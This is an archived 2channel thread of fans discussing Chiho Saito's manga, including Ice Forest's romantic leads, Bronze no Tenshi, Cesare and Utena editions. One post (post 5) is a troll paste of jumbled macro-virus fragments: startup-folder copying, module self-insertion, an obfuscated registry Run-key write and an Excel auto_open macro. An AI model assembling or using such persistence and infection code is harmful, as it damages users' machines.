2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

○●さいとうちほ 5●○

1 :花と名無しさん:2007/08/30(木) 00:46:50 ID:???0
「アナスタシア倶楽部」「花冠のマドンナ」「花音」
「少女革命ウテナ」「ファースト・ガール」
「もう一人のマリオネット」「円舞曲は白いドレスで」等々
さいとうちほ作品全般を語るスレです。

現在はASUKA増刊で「SとMの世界」連載(休載?)
フラワーズで「ブロンズの天使」を連載中。
プチコミックで「ビューティフル」を連載中。

スレルール・過去スレ等は>>2-3へ。


2 :花と名無しさん:2007/08/30(木) 00:47:57 ID:???0
【スレルール】

さいとうさんは長く描いてる、作品数の多い作家さんです。
当然色んな読者層がいますので以下のルールを守って
スレ住人皆が気持ちよく共存出来るようにしましょう。

・昔のほうがいい・今のほうがいいという話題はやめましょう。
・作風が違うといってけなすのはやめましょう。 
・自分が知らない作品の話題が続いていても「話に入れない」等のレスはやめましょう。
・作品やキャラの比較(〜のがイイ。〜は駄作)等はやめましょう。
・メディアミックスされたウテナの話題もOKなので「スレ違い」というのはやめましょう。
 ※但しあくまで少女漫画スレなのでアニメ寄りにならないように、節度を持って話しましょう。


3 :花と名無しさん:2007/08/30(木) 00:54:53 ID:???0
【過去スレ】

▲▽▲▽さいとうちほ▲▽▲▽ ( 02/02/02 〜)
http://comic.2ch.net/gcomic/kako/1012/10126/1012648854.html

○●さいとうちほ○●   (02/09/27〜)
http://comic4.2ch.net/test/read.cgi/gcomic/1033065198/

○●さいとうちほ2○●  (04/06/09〜)
http://comic6.2ch.net/test/read.cgi/gcomic/1086748910/

○●さいとうちほ3○●  (04/12/23〜)
http://comic6.2ch.net/test/read.cgi/gcomic/1103795681/

○●さいとうちほ4○●   (05/11/11〜)
http://anime2.2ch.net/test/read.cgi/gcomic/1131638233/




4 :花と名無しさん:2007/08/30(木) 01:14:28 ID:???0
     ::|
     ::|    ____
     ::|.  ./|=|    ヽ.    ≡三< ̄ ̄ ̄>
     ::|. / |=|  o  |=ヽ     .≡ ̄>/
     ::|__〈 ___  ___l   ≡三/ /
     ::|、ヽ|.|┌--、ヽ|/,-┐|    ≡/  <___/|
     ::|.|''''|.\ヽ--イ.|ヽ-イ:|  ≡三|______/
     ::|.ヾ |.::. .. ̄ ̄| ̄ /
     ::|  ';:::::┌===┐./
     ::| _〉ヾ ヾ二ソ./       こ、これは>>1乙じゃなくてスラッガーなんだから
     ::||ロ|ロ|  `---´:|____    変な勘違いしないでよね!
     ::|:|ロ|ロ|_____/ロ|ロ|ロ,|`ヽ
     ::| |ロ|旦旦旦旦旦/ロ/ロ|旦,ヽ
     ::|ロヽ 旦旦旦旦旦./ロ,/|::旦旦)
     ::|ヾ旦旦旦旦旦旦,,,/::::|、 旦旦|

5 :花と名無しさん:2007/08/30(木) 05:10:07 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/08/31(金) 00:13:14 ID:???0
>1 乙〜
でもブロンズもビューティフルも終わってるがな

7 :花と名無しさん:2007/08/31(金) 05:06:42 ID:???0
私の心の中では生き続けてるのよ。

8 :花と名無しさん:2007/09/03(月) 17:00:48 ID:zS02SDlU0
アイスフォレストは??

9 :花と名無しさん:2007/09/03(月) 18:13:47 ID:???0
まだ、どちらの男性キャラにも、さほど萌えていない。
まぁ、まろん君の方が、本命か?解らないよ。


10 :花と名無しさん:2007/09/03(月) 18:36:08 ID:???0
http://sakuratan.ddo.jp/imgboard/img-box/img20070831005336.jpg

11 :花と名無しさん:2007/09/03(月) 22:33:17 ID:???0
>>10はグロ画像

>>9
最初に出てきたオーナーの方じゃまいか?>相手役
自分もまだ、どっちにも萌えてないんだよな…。

12 :花と名無しさん:2007/09/04(火) 12:38:41 ID:???0
オーナーだったらアラベスク
ロマンだったらエースをねらえ!

13 :花と名無しさん:2007/09/08(土) 03:07:32 ID:???O
実はコーチだったらどうしよう…

個人的にはマロン推し。


14 :花と名無しさん:2007/09/08(土) 08:22:49 ID:???0
マロンの死後オーナーに乗り換える。

15 :花と名無しさん:2007/09/25(火) 03:09:36 ID:pUK2KJ4iO
恋物語好きだったな。
また続編出ればいいのに。
さいとう男性キャラってエロかっこいいよね。

16 :花と名無しさん:2007/09/25(火) 08:44:27 ID:???0
恋物語って暇な時?にちょこちょこ書いてんじゃないの?

17 :花と名無しさん:2007/09/26(水) 00:08:46 ID:???0
最近同僚に大量にさいとうちほ漫画借りてどっぷりハマってしまって
今オクで買い漁ってますw

質問なんですが、円舞曲の文庫に番外編(ライラックノクターンと
恋物語の8巻に載ってたことが将臣の子供産むやつ)
って載ってますか?載ってましたら何巻に載ってるか教えてくださいませ。

オクで円舞曲と白木蓮セット買ったはいいけど番外編が
読みたいんだな・・・
みんなセット売りするからバラでは売ってくれないしorz


18 :花と名無しさん:2007/09/26(水) 08:31:35 ID:???0
文庫版には全部入ってるはず。タイトル忘れちゃったけど、ライラックだった気がする。
子どもも文庫版でちゃんと産んでた。

19 :花と名無しさん:2007/09/26(水) 09:09:54 ID:???0
>>17
文庫
3巻に「紫丁香夜想曲」が
4巻に「月下香小夜曲」が収録されてる
3巻と4巻だけ買うのもアレなんで文庫で買いなおせw

20 :花と名無しさん:2007/09/26(水) 22:28:00 ID:???0
>>18
>>19

17です。教えてくれてdです!!
文庫本だけを買えばよかったー!!!
円舞曲シリーズのほかに花冠のマドンナとかも
セットだったからつい買っちゃったorz
文庫本買いなおすわw

21 :花と名無しさん:2007/09/29(土) 15:24:08 ID:???0
アイスフォレスト、早速単行本になるんだね。
購入を迷う。今の所、ロマン君が、可愛いけど、なんだか、オーナーの方が、
本命ぽいっかな。作者も決めかねているのか?
まぁ、良い男、2人に、言い寄られ揺れ動くヒロインは、お約束だけど。

オーナーと結ばれた後、事故死で男が死んだ後、傷心を乗り越えて
ロマンと世界を目指す話だけは、いやだなぁ。
(そんなベタな展開には、ならんだろうが・・・)

22 :花と名無しさん:2007/09/30(日) 00:04:53 ID:???0
http://news22.2ch.net/test/read.cgi/newsplus/1191044933/l50

マリアとアレクセイの遺骨も発見されたんだって。

23 :花と名無しさん:2007/10/03(水) 00:02:14 ID:???O
丸一ヵ月経ったのに、レスがこんだけってどんだけー
いよいよハーレクインに流れちゃうのかな

24 :花と名無しさん:2007/10/04(木) 06:56:12 ID:???0
>>23
>いよいよハーレクインに流れちゃうのかな

意味不明

25 :花と名無しさん:2007/10/04(木) 12:35:32 ID:???O
ふとウテナってどんな話かと思ってアニメを数話見たらどっぷりはまってしまいました。
漫画も読みたいと思ったのですが高くても文庫版の方がいいですかね?
あまり大差ないようなら文庫じゃなくてもいいかな…

26 :花と名無しさん:2007/10/05(金) 22:21:52 ID:???0
オーナーがカムバックというのはありえないだろうけど、選手時代を見たい。

27 :花と名無しさん:2007/10/06(土) 00:12:51 ID:???0
アイスダンス微妙で静観してたけど今回いろいろ話が動いておもしろかった
でもちゃんと読んでなかったから最後の場面でロマン君のうしろにいた女の人がだれだったかわからん
オーナーの恋人?

28 :花と名無しさん:2007/10/09(火) 16:24:12 ID:???O
同じリンクでアイスダンスやってるベテラン選手だよね?
珠洲のライバル(でも指導してくれたりもする)。
オーナーとは恋人ではないけど…好意持ってるのかもね。
ロマンよりオーナーのが好きだな〜。

29 :花と名無しさん:2007/10/09(火) 22:41:29 ID:???0
黒姫さんでしょう?
オーナーの元カノで今でも未練があるんじゃないのかな。

30 :花と名無しさん:2007/10/09(火) 22:45:22 ID:???0
ロマンも珠洲もベタ塗り黒髪だから、並んだ感じオーナーとの
ツーショットの方が、しっくりくるかな。
さいとう先生の連載漫画で、ベタ塗り黒髪カップル同士て、
あまり、ハッピーエンドのイメージが無い。ブロンズのイメージが強いのか。
レディーマスカレードは、幸せだったかな。
白髪(?)ベタなし頭同士も悲恋モノのイメージがあるなぁ・・・。
バシリスや、花音が、そうだった。

オーナーの方が、今の所ヒロインに対して、好意を持っている事を
自覚しているから、一歩リード。
でも、ロマン君の顔の方が好みかな。

昔の少女漫画の定石で言えば、ヒロインが、初めて出会う男性と、
恋に落ちていき、運命的に発展していくのが、お約束だったんですが。
それで言えば、オーナーの方が運命的だと思うけど、今は、定石とか、
関係無いしね。まぁ本命が、連載数年経ってから登場という例も有るし。






31 :花と名無しさん:2007/10/11(木) 04:20:05 ID:???0
ロマンの髪型って、チェーザレやSMのマキャベリオ(だったっけ?)と同じだなぁ。
何でいつもあの髪型出すんだろう。
もっと新しい髪型を考えればいいのに…拘りでもあるのかね?

32 :花と名無しさん:2007/10/16(火) 00:35:40 ID:???O
さいとう先生の描く男性キャラのセクシーさは異常

33 :花と名無しさん:2007/10/20(土) 23:27:43 ID:???0
死んで欲しくない男ほど死んでいく悲しさ…

34 :花と名無しさん:2007/10/21(日) 22:35:44 ID:jbbSv5WI0
あげ

35 :花と名無しさん:2007/10/21(日) 23:07:50 ID:aSYz/mxLO
中国の例の遊園地にウテナがいてびっくりした。

36 :花と名無しさん:2007/11/03(土) 15:23:17 ID:???0
頭だけしか写ってないアンシーにワロタ

37 :花と名無しさん:2007/11/04(日) 17:50:14 ID:???0
やっぱり、オーナーの方が、当て馬ぽいね。<アイスフォレスト
2週間のモスクワ暮らしで、一気に、ロマン君と急接近か?
面白くなりそう。1巻買うかな。

38 :花と名無しさん:2007/11/06(火) 18:58:35 ID:???0
>>37
そうかな?
まだ全く分からんけど、どっちかというとオーナーが本命設定じゃないかなと思う。
てか当分はロマン君とオーナーの両天秤で行って、
読者人気が出た方を本命決定って可能性もありそう。

でもなぁ…氷森、どっちの男キャラも今までの作品より魅力に欠ける気がするんだよなぁ。
どっちとくっついても似たり寄ったりっていうか。
個性が足りない…。

39 :花と名無しさん:2007/11/06(火) 19:55:01 ID:???0
将臣さんやプーみたいに、君だけをただひたすら愛す!
という気概をこれから期待するよ。
でも、相変わらずアイスダンスシーンや、カラーページは、美しいよ。


40 :花と名無しさん:2007/11/06(火) 23:36:53 ID:???0
>将臣さんやプーみたいに、君だけをただひたすら愛す!
>という気概をこれから期待するよ。

それは、オーナーの叔父がどう出るかにかかっているな。

あと、オーナー曰く「ロマン君はひどい事件に巻き込まれて日本に来た」けど
その事件には元婚約者兼パートナーが絡んでいるのかな、やっぱり。

41 :花と名無しさん:2007/11/07(水) 01:07:59 ID:???0
オーナーもロマン君も、ちょっとおっさん臭くない?
雰囲気的に…

42 :花と名無しさん:2007/11/07(水) 22:17:51 ID:???0
>>37
同意。
個人的には珠洲とオーナーが結ばれてほしいけど、
なんとなくロマンが本命っぽい。
あくまで、オーナーはあしながおじさん的ポジションっぽい。

43 :花と名無しさん:2007/11/07(水) 23:48:52 ID:???0
現段階では判断つかんよ

44 :花と名無しさん:2007/11/08(木) 20:55:34 ID:???O
オーナーなんかいけ好かないからロマンのほうがいいんだけど
完全なオンアイスカップルっていうほうが萌える。
しかし結成すぐにリベルタンゴってなんか微妙…

あとこの人の体の線がすごく好き。
リアルのアイスダンサーの身体もこんな感じだし

45 :花と名無しさん:2007/11/08(木) 21:51:14 ID:???0
ファーストガールを思い出すよ。<タンゴ
珠洲が、どちらを本命として恋するのかは、まだ解らないけど
どちらを選んでも、別の男性と弾みでも寝ないで欲しい。
浮気は、しないでくれ。ファーストガール、好きな作品だったけど
NY編は、ちょっと萎えたよ。

46 :花と名無しさん:2007/11/08(木) 22:03:42 ID:???0
最初に登場してヒロインと出会った様子からして
オーナーの方が本命だと思うんだけどなー。
でも最近の展開ではロマン有利っぽい?
>>38の言うように、読者の人気で最終決定するかもね。

>>45
わかる>ファーストガール
さいとうさんの作品って、基本的にヒロインがフラフラするけど
ファーストガールはそれが酷かった。

47 :花と名無しさん:2007/11/19(月) 03:07:54 ID:???0
ブロンズの天使でダンテスとナターリアが
どんどん惹かれ合ってくやりとりが良かったなぁ。
ダンテスの綺麗で率ないやり取りにうっとりしたりさ。
表情や仕草がいちいち色っぽくてさ。

バカみたいにすぐ寝たりしなかったのもいい。
だから最後はプーシキンの元にちゃんと帰るって
分かっちゃいるけど、ああなるしかないって
納得はしてるけどさ、昔の王道な少女マンガ
ばりにダンテスとナターリアがどうにかくっつく方向を
最後まで望んでいたよ。
まぁ昔の少女マンガだったら、浮気なんてしないで
初めての相手とどこまでも突き進むんだけどね。








48 :花と名無しさん:2007/11/19(月) 13:24:09 ID:???0
>>47
全文同意。
ダンテス、前半のナターリアとのやり取りは、
まるで将臣さんみたいなフェロモンばりばりの格好良さだった。
後半ヘタレ青年になったけどw

史実だから最後の展開は仕方ないけど、一つ不満があるのは
やっつけ的にエカテリーナとくっつけた感じがした事だなぁ。
あの辺りはプー×ナターリアのシーンに気合い入ってたからなのか、
ダンテス関連の描写が超おざなりだった印象。

49 :花と名無しさん:2007/11/19(月) 17:30:53 ID:???0
前半(駆け落ち失敗前まで)のダンテスは完璧だったよね。
まだナターリアを「今1番お気に入りの女性」と思ってる
位の時は駆け引き上手でそれを楽しんでて、本気になってからも
またそれはそれで良かったなぁ。
あと風呂場でへッケルンに裸見せてうまく欺いた
シーンなんてどうよ?あの表情。

まぁ女で破滅するタイプだしエカテリーナみたいな献身的な
女性があってこそ、またあそこまで登りつめる事ができたのかと。
(ちっとも面白い展開ではないけど)
ダンテスはさいとうちほマンガの中で将臣さんの次にはまったわ。
次がチェーザレ。



50 :48:2007/11/19(月) 18:04:34 ID:???0
>>49
あー、チェーザレと比べたら自分は、
将臣さん>チェーザレ>ダンテスでダンテス3番目なってしまうなw
将臣さんとチェーザレは2人とも、最期の最期まで格好良かったからなぁ…。
チェーザレが相手役になってたら多分、将臣さんと張ってたくらい好きだ。

特にあの死に際の「わたしのイタリア…」のシーン。
ヒロインに「イタリア統一の夢」と「男としての愛情」の全てを重ねて
その両方を手に入れた幻の中で死んでくって流れ、マジで泣けた。・゚・(ノД`)・゚・。

51 :48:2007/11/19(月) 18:07:51 ID:???0
でもあのラストは、ヒロインと結ばれなかったからこそ生きたんだよな…。
イタリアもヒロインも手に入れられず、幻ってとこがミソで。
相手役になってたら、あのシーンの感動薄かったかなぁ。

52 :花と名無しさん:2007/11/21(水) 21:43:05 ID:???0
チェーザレは孤高の独裁者だったから良かったんだよね。
将臣ダンテスと恋敵がああいうタイプの場合だと
ヒーロー役が皆むだに優しすぎて物足りないんだよね。
サジットしかり王子しかり、もちプーシキンもさ。
たまに嫉妬むき出しで荒々しい一面を見せるのは良いけど。


53 :花と名無しさん:2007/11/22(木) 01:28:08 ID:???0
>>52
>恋敵がああいうタイプの場合だと
>ヒーロー役が皆むだに優しすぎて物足りない

だね…
当て馬に比べて、ヒーローが優しすぎて魅力に欠ける事が多い

54 :花と名無しさん:2007/11/22(木) 20:43:54 ID:???0
マリオネット ワルツ 花冠 ブロンズは好きで
アナスタシアは1巻で挫折ファーストガールも
そんなにあれだったタイプなんだけど
バジリスの娘はまだ読んだことない。
これって読んどいた方がいいかな?教えて読んだ人。

55 :花と名無しさん:2007/11/22(木) 20:50:09 ID:???0
>>50
それにダンテスはチェザーレと将臣さんほど苦労はしていなさそうだな。
国外追放にはなったけど後に出世して大金持ちになったし、
エカテリーナが4人目の子供を産んでから亡くなったものの、
暖かい家庭を築くことが出来たからね。

56 :花と名無しさん:2007/11/23(金) 01:49:15 ID:???0
>>54
ワルツ、花冠、ブロンズが好きで
アナスタシアとファーストガールがいまいちだった自分としては
バシリスいまいちだった。
面白くないとかいう以前に、作品の印象自体が薄いしな…。

まあ、さいとう先生ファンなら読んでみるのもいいと思うけど。

57 :花と名無しさん:2007/11/23(金) 01:55:30 ID:???0
>>55
史実の人だからしょうがないけど、個人的にダンテスの最大のマイナスポイントは
ヒロイン以外の女性とくっついたとこだなw
湖都一途だった将臣さんは言うに及ばず、チェーザレもフランスの妻子とは疎遠だった。
ダンテスはエカテリーナにほだされて転んでしまったもんなぁ。

58 :花と名無しさん:2007/11/23(金) 05:40:27 ID:???0
>>57
決闘でダンテス側が死んだ方が印象はよっぽど良かったかもね。
まぁ史実だからしょうがないとして。
当て馬にしてはダンテスは格好良く描きすぎたけど
最後はプーに華を持たせたいからちょっとちょっと
駄目な部分を見せていったけど最初の頃との
ギャップが出すぎて変な感じになってしまったって感じかな。

そういえば、チェーザレは実妹を本気で愛していたよ。
あれはあれで二股とか感じず、すんなり納得できる形だったけどね。


59 :花と名無しさん:2007/11/23(金) 15:16:18 ID:???0
チェーザレは奥さんがいても妹がいても
やっぱり死ぬ間際に主人公だけを思い出した描写がデカいね

60 :花と名無しさん:2007/11/23(金) 18:39:16 ID:???0
>>54
バシリス、設定は、結構エロかったけど、ラストは、
あっさりしすぎて、オイオイvvて感じでした。物足りない。
でも、私は、アナスタシアとファーストガールとビューテフルが、
好きだから、感じ方は、違うと思うけどね。一度読んでみて。



61 :54:2007/11/23(金) 20:27:27 ID:???0
>>56
>>60
トントン!さいとうちほ好きだしブックオフで100円の探して
読んでみるよ。
ついでに原作がビーパパスって誰よ?って思って
手を出していなかったウテナも探してみるかな。




62 :花と名無しさん:2007/11/27(火) 23:52:38 ID:UsUlGNkA0
港の片隅絵  >33

63 :花と名無しさん:2007/11/28(水) 00:59:45 ID:???0
あとがきで「今井康江」さんからフィギュアスケートの資料を譲ってもらった、
ってあったんで、Wikiで見てみたら、『くるりんぱっ!』っていう作品で、
そのあらすじの書きようにめちゃワロタ。

64 :花と名無しさん:2007/11/28(水) 10:33:46 ID:???0
すみません、本持ってないので記憶で質問なのですが、
この作者さんの漫画で花音というのがありますが、
そこで主人公の女性がゆずりうけたバイオリン(製作者?)の名前ってどういうのか
わかる方いらっしゃいましたら、おしえていただけますでしょうか。<(  )>
たしか、理性と本能みたいな表現をするという説明があったような気がします。



65 :花と名無しさん:2007/11/28(水) 22:23:24 ID:???0
氷森、オーナーやロマン君より、
たった一コマのパウロ君のアップに今までで一番萌えてしまった…

66 :花と名無しさん:2007/11/30(金) 01:01:11 ID:???0
>>64
ガダニーニ

67 :花と名無しさん:2007/12/02(日) 03:18:37 ID:hglwmHxyO
今日氷森の帯見て初めてアナスタシアの続編の存在知ったんだけど、
4巻発売後にアナスタシアの続編書き下ろすの初めてだよね?
アナスタシア大好きだったからもし今まで読み逃してたんだったらショックだorz

68 :花と名無しさん:2007/12/02(日) 03:42:15 ID:???O
6月発売の凛花から連載してるよ>アナスタシア

69 :花と名無しさん:2007/12/02(日) 04:43:10 ID:hglwmHxyO
>>68
教えてくれてどうもありがとう
バックナンバー探してみたが在庫ないし…orz

70 :花と名無しさん:2007/12/02(日) 13:29:11 ID:???0
ポピペ

910 名前:名無しんぼ@お腹いっぱい[sage] 投稿日:2007/12/02(日) 13:21:33 ID:tAYNwcSr0
少女漫画だと、どうしても主人公が若くて未婚の女の子で恋愛主体であることが求められるからなあ。
一方歴史ものって長い期間を描くから、主人公が30代40代になることも当たり前。
昔は女性が表立って何かをした例は少ないし、政治や戦争政争描写も避けて通れない。
アルカサルみたいのは作者が大御所だし例外だと思う。

最近読んだブロンズの天使みたいに、個人対個人を主眼において、華やかな宮廷内の
あれこれを描く類のものだったら少女漫画にもけっこうあるけれど。
あそういやブロンズの天使描いた人は以前チェーザレも描いてたっけ。
準主役だったけど主役をくう勢いだった記憶がw


71 :花と名無しさん:2007/12/02(日) 17:34:19 ID:???0
英語のウィキにムッフィたんの事詳しく書いてあるんだけど、なかなか面白い。
ニックと幼い時会った時からお互い好きになって結婚してもずっとラブラブで、
病気になった時、愛人ができてショックだったけどその愛人とも仲良くなった

72 :花と名無しさん:2007/12/02(日) 18:22:12 ID:???0
( ・∀・)つ〃∩ ヘェーヘェーヘェー

愛人ってナターリアじゃないよな

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)